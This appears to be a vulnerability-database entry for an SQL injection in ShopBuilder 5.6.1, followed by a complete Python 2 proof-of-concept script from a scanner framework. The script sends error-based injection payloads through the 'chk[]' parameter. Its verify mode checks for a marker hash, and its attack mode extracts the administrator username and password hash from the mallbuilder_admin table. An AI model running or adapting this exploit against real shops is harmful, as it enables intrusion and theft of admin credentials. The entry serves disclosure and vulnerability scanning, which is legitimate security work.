ShopBuilder 5.6.1 /module/activity/admin_activity_product_list.php SQL注入漏洞

🗓️ 28 Oct 2014 00:00:00Reported by RootType
ShopBuilder 5.6.1 SQL Injection Vulnerabilit

                                                #!/usr/bin/env python
# coding=utf-8

import re
import urllib2

from comm import cmdline
from comm import generic


poc_info = {
    'VulId': '1563',
    'Name': 'ShopBuilder 5.6.1 /module/activity/admin_activity_product_list.php SQL注入漏洞 POC',
    'AppName': 'ShopBuilder',
    'AppPowerLink': 'http://www.shop-builder.cn',
    'AppVersion': '5.6.1',
    'VulType': 'SQL Injection',
    'Desc': '''
            chk 参数未经过过滤拼入 SQL 语句，造成 SQL 注入漏洞。
            ''',
    'Author': ['zhengdt @ knownsec'],
    'VulDate': '2014-09-29',
    'CreateDate': '2014-10-13',
    'UpdateDate': '2014-10-13',
    'References': ['http://wooyun.org/bugs/wooyun-2014-072830'],
    'Version': '1',
}

io_info = {
    'URL': '',
    'Mode': 'v',
    'Verbose': False,
    'Error': '',
    'Status': 0,
    'Result': {}
}


def main(io_info):
    url = io_info.get('URL', '')
    mode = io_info.get('Mode', 'v')
    verbose = io_info.get('Verbose', False)
    headers_fake = generic.modify_headers(io_info)

    vul_url = '%s/?m=activity/admin&s=activity_product_list' % url

    if mode == 'v':
        try:
            payload = 'chk[]=1) and (select 1 from(select count(*),concat((select (select (select md5(15136' \
                      '44312))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from informati' \
                      'on_schema.tables group by x)a)#'

            if verbose:
                print '[*] %s - Executing payload ...' % url
            response = urllib2.urlopen(urllib2.Request(vul_url, headers=headers_fake, data=payload)).read()

            if '4be0d4871abae85cae972cd885f5b1e9' in response:  
                io_info['Status'] = 1
                io_info['Result']['VerifyInfo'] = {}
                io_info['Result']['VerifyInfo']['URL'] = url

        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return

    if mode == 'a':
        try:
            payload = 'chk[]=1) and (select 1 from(select count(*),concat((select (select (select concat(' \
                      'user,0x3a,password) from mallbuilder_admin limit 1)) from information_schema.table' \
                      's limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'

            match_data = re.compile('Duplicate entry \'(.*):([\w\d]{32})1\'')

            if verbose:
                print '[*] %s - Executing payload ...' % url
            response = urllib2.urlopen(urllib2.Request(vul_url, headers=headers_fake, data=payload)).read()

            if verbose:
                print '[*] %s - Get username and password of admin ...' % url

            username, password = match_data.findall(response)[0]

            if username and password:  
                io_info['Status'] = 1
                io_info['Result']['AdminInfo'] = {}
                io_info['Result']['AdminInfo']['Username'] = username
                io_info['Result']['AdminInfo']['Password'] = password

        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return


if __name__ == "__main__":
    cmdline.main(io_info, usage='', argvs=[])
    if io_info['Verbose']:
        print '\n[*] Init ...\n'
    main(io_info)
    print generic.output(io_info)
28 Oct 2014 00:00Current
7.1High risk
Vulners AI Score7.1